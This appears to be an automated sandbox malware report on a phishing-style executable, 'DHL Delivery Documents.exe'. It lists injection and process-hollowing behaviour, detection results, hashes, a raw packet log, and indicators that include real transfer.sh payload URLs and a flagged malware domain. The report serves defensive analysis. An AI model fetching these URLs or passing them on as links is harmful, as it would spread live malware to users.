          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562120 Sample: DHL Delivery Documents.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Antivirus detection for URL or domain 2->35 37 7 other signatures 2->37 10 DHL Delivery Documents.exe 14 3 2->10         started        process3 dnsIp4 29 transfer.sh 144.76.136.153, 443, 49751, 49752 HETZNER-ASDE Germany 10->29 27 C:\Users\...\DHL Delivery Documents.exe.log, ASCII 10->27 dropped 45 Writes to foreign memory regions 10->45 47 Allocates memory in foreign processes 10->47 49 Injects a PE file into a foreign processes 10->49 15 aspnet_compiler.exe 10->15         started        file5 signatures6 process7 signatures8 51 Modifies the context of a thread in another process (thread injection) 15->51 53 Maps a DLL or memory area into another process 15->53 55 Sample uses process hollowing technique 15->55 57 2 other signatures 15->57 18 explorer.exe 15->18 injected process9 process10 20 msdt.exe 18->20         started        signatures11 39 Modifies the context of a thread in another process (thread injection) 20->39 41 Maps a DLL or memory area into another process 20->41 43 Tries to detect virtualization through RDTSC time measurements 20->43 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          DHL Delivery Documents.exe31%VirustotalBrowse
          DHL Delivery Documents.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          7.0.aspnet_compiler.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.aspnet_compiler.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.microsoft.c0%URL Reputationsafe
          http://crl.microf0%Avira URL Cloudsafe
          http://crl.micros.0%Avira URL Cloudsafe
          www.trabaho-academy.net/zqzw/1%VirustotalBrowse
          www.trabaho-academy.net/zqzw/100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          transfer.sh
          144.76.136.153
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://transfer.sh/get/mVKia7/BINCC.txtfalse
              high
              www.trabaho-academy.net/zqzw/true
              • 1%, Virustotal, Browse
              • Avira URL Cloud: malware
              low
              https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://transfer.shDHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.microsoft.cDHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesLDHL Delivery Documents.exefalse
                    high
                    http://crl.microfDHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.micros.DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtxDHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        144.76.136.153
                        transfer.shGermany
                        24940HETZNER-ASDEfalse
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:562120
                        Start date:28.01.2022
                        Start time:14:02:32
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 52s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:DHL Delivery Documents.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:18
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@7/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 64% (good quality ratio 58.7%)
                        • Quality average: 71.6%
                        • Quality standard deviation: 31.2%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 76
                        • Number of non-executed functions: 166
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115
                        • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        14:03:32API Interceptor1x Sleep call for process: DHL Delivery Documents.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        144.76.136.153EasyCheat.exeGet hashmaliciousBrowse
                        • transfer.sh/get/ittola/Scqrsdtrl.png
                        OZ5XkYPXcG.exeGet hashmaliciousBrowse
                        • transfer.sh/get/XN16WS/Psminaz.png
                        ORDER 211011A.xlsmGet hashmaliciousBrowse
                        • transfer.sh/get/HyKymv/wordart.exe
                        ORDER 211011A.xlsmGet hashmaliciousBrowse
                        • transfer.sh/get/HyKymv/wordart.exe
                        7D7J29AK4L60S.vbsGet hashmaliciousBrowse
                        • transfer.sh/dS6EmG/gfyhjrr.txt
                        Invoice_9652170.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/TKvxUI/Aunty.txt
                        PO 11029.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/a6DUG4/Server.txt
                        Invoice 223.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/Bu2lYU/Server.txt
                        Invoices #141.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/iLSvYs/bypass.txt
                        Receipt_12203.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/E2oQCW/Server.txt
                        Invoice #60122.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/Vp6k0P/Server.txt
                        M00GS82.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/QipjYs/fOOFFK.txt
                        #P0082.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/4YgL52/HJN.txt
                        Invoice #33190.vbsGet hashmaliciousBrowse
                        • transfer.sh/get/1jDQCmj/trivago.txt
                        ZHDJFEB83MK.vbsGet hashmaliciousBrowse
                        • transfer.sh/15cCRXY/KFKFKF.txt
                        #W002.vbsGet hashmaliciousBrowse
                        • transfer.sh/1YKpmfw/HmS.txt
                        WOO62_InvoiceCopy.vbsGet hashmaliciousBrowse
                        • transfer.sh/p/SHJA.txt
                        A719830-Paid-Receipt.vbsGet hashmaliciousBrowse
                        • transfer.sh/b/deef.txt
                        S0187365-Paid-Receipt.vbsGet hashmaliciousBrowse
                        • transfer.sh/1w231Gc/eeff.txt
                        X92867354_PAYMENT_RECEIPT.vbsGet hashmaliciousBrowse
                        • transfer.sh/1cKLmWw/defff.txt
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        transfer.shDHL_Jan 2022 at 1.28_81BZ290_JPG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        BANK DETAILS-26012022-971332pdf.gz.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        Attachments.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        Attachments.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        SHIPPING DOCUMENTS.EXEGet hashmaliciousBrowse
                        • 144.76.136.153
                        EasyCheat.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        Zam#U00f3wienie zakupu -AR95647,pdf.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        BANK DETAILS-25012022-971332pdf.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        Purchase Order 25.01.2022.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        BANK SLIP.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        BANK INFORMATION-M0025012022-971332pdf.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        DHL_Jan 2022 at 1.20_8BZ2290_JPG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        FedEx Package.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        SecuriteInfo.com.MSIL.TrojanDownloader.Agent.KBO.23714.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        OZ5XkYPXcG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        SKM-210221.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        lK2NItAmQC.xllGet hashmaliciousBrowse
                        • 144.76.136.153
                        IMG_212022100120011.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        MV SHENGSHI TBN - Vessel's Particulars.docx.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        DHL_Jan 2022 at 1.40_80BZ290_JPG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        HETZNER-ASDEReport.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        copy_payment.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        Rech_2022_01.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        2026P-2801.xlsGet hashmaliciousBrowse
                        • 159.69.43.124
                        Mail_27012022.xlsGet hashmaliciousBrowse
                        • 159.69.43.124
                        gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                        • 159.69.43.124
                        x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                        • 159.69.43.124
                        sample.dllGet hashmaliciousBrowse
                        • 188.40.137.206
                        cAqr3kM03S.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        DHL_Jan 2022 at 1.28_81BZ290_JPG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        69587934636618461302.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        gD57NpzpaB.exeGet hashmaliciousBrowse
                        • 136.243.172.101
                        Fkus4gV8H5.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                        • 159.69.43.124
                        q5HvnqyamG.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        zqF4FsvaXO.xlsGet hashmaliciousBrowse
                        • 188.40.137.206
                        BR 18833597536.xlsGet hashmaliciousBrowse
                        • 159.69.43.124
                        VL29H5ujr1.dllGet hashmaliciousBrowse
                        • 188.40.137.206
                        3cGJDUElPz.dllGet hashmaliciousBrowse
                        • 188.40.137.206
                        fKipbTnBKG.exeGet hashmaliciousBrowse
                        • 136.243.172.101
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        54328bd36c14bd82ddaa0c04b25ed9adCHINESE NEW YEAR SHUT DOWN MEMO.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        396180999746067.xlsmGet hashmaliciousBrowse
                        • 144.76.136.153
                        DHL_Jan 2022 at 1.28_81BZ290_JPG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        gD57NpzpaB.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        f3mBsmzA6O.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        jRj5iwlnuR.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        J4ccxj94YD.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        fKipbTnBKG.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        BANK DETAILS-26012022-971332pdf.gz.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        8MnPvBzj15jLYOx.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        467890987654323456789098765432345678.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        Invoice.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        j2nrFZjDdk.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        s84MHhcnAc.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        MEmu-setup-abroad-sdk.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        315zYnEWbB.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        xgnbxXP1sg.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        QyVXAyaraZ.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        TWWDC8zoOr.exeGet hashmaliciousBrowse
                        • 144.76.136.153
                        No context
                        Process:C:\Users\user\Desktop\DHL Delivery Documents.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1076
                        Entropy (8bit):5.368419236023932
                        Encrypted:false
                        SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKEYHKGD8AoPtHTG1hAHKKPN+vxpNT
                        MD5:BA59E2E532D7B32DDB5669F4DDA552B9
                        SHA1:56321A97094257CE0B8DD955B6F433D971093890
                        SHA-256:C46FC927838D524FB8361EA17F8BB19694C7175106544FE95367E5DF8BD9891B
                        SHA-512:2F1702E762B6DA239580311D0EEFF203DA8D584D6B5E0922DB730A4CE770DA46B750C380B70D3BED632DFBE28CAAB27B6067EEE57C152EE51828E03E5BA2214F
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V
                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):6.616131066331666
                        TrID:
                        • Win64 Executable GUI Net Framework (217006/5) 49.88%
                        • Win64 Executable GUI (202006/5) 46.43%
                        • Win64 Executable (generic) (12005/4) 2.76%
                        • Generic Win/DOS Executable (2004/3) 0.46%
                        • DOS Executable Generic (2002/1) 0.46%
                        File name:DHL Delivery Documents.exe
                        File size:48640
                        MD5:5bc8492c9f262d1f9840635b87edf9c5
                        SHA1:da867a8b837e43c91414ff46d239ab95b799d04b
                        SHA256:7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
                        SHA512:a9f75f93607443861c6b2ec9f242faacda666967cb6cbdab8cb8c8f208047a7a90448046242aead694fe391a2bbcb9f52688bdbee08bf492cb511f71748a365e
                        SSDEEP:768:24jw5Zoo7adxM2GzRpAgka/8HHUTQQQQQQQBdy3bI91GN6bcE/2ihWSCAtkrjL1X:2Awzf3Rpga/eHUTQQQQQQQBdBgN6b5/S
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....+.a.................8............... ....@...... ....................................@...@......@............... .....
                        Icon Hash:a289a9ed6da39200
                        Entrypoint:0x400000
                        Entrypoint Section:
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61F32B10 [Thu Jan 27 23:30:24 2022 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:
                        Instruction
                        dec ebp
                        pop edx
                        nop
                        add byte ptr [ebx], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x8328.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x57960x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x37e00x3800False0.435965401786data5.4642521586IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x60000x83280x8400False0.587446732955data6.83628691595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x61c00x468GLS_BINARY_LSB_FIRST
                        RT_ICON0x66280x1128data
                        RT_ICON0x77500x2668data
                        RT_ICON0x9db80x40a2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                        RT_GROUP_ICON0xde5c0x3edata
                        RT_VERSION0xde9c0x2a0data
                        RT_MANIFEST0xe13c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright 2022
                        Assembly Version1.0.0.0
                        InternalNameBNCXGAS.exe
                        FileVersion1.0.0.0
                        ProductNameBNCXGAS
                        ProductVersion1.0.0.0
                        FileDescriptionBNCXGAS
                        OriginalFilenameBNCXGAS.exe
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 28, 2022 14:03:28.264552116 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.264620066 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.264719009 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.520648003 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.520692110 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.610454082 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.610636950 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.614259005 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.614284992 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.614578962 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:28.671480894 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:28.989583015 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.029881001 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354017973 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354074001 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354084969 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354152918 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354182005 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354185104 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354199886 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354222059 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354232073 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354243994 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354269981 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354294062 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354485035 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354500055 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354542971 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354552984 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354582071 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354592085 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.354604006 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.354641914 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377412081 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377456903 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377516031 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377540112 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377553940 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377646923 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377782106 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377820015 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377871037 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377899885 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.377914906 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.377954006 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378340960 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378381014 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378426075 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378438950 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.378479958 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.378498077 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400721073 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400764942 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400840998 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400882006 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400899887 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400934935 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.400964022 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.400999069 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401032925 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401046991 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401071072 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401098013 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401119947 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401415110 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401453018 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401499987 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401530027 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401540995 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401575089 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401732922 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401768923 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401814938 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401833057 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.401906013 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.401926041 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402079105 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402122021 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402169943 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402187109 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402199030 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402245998 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402342081 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402381897 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402431011 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402445078 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.402477026 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.402492046 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424608946 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424653053 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424720049 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424743891 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.424792051 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.424817085 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425146103 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425185919 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425237894 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425247908 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425298929 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425792933 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425863028 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425884008 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425899982 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425914049 CET44349751144.76.136.153192.168.2.3
                        Jan 28, 2022 14:03:29.425940990 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.425968885 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.431032896 CET49751443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.460984945 CET49752443192.168.2.3144.76.136.153
                        Jan 28, 2022 14:03:29.461054087 CET44349752144.76.136.153192.168.2.3
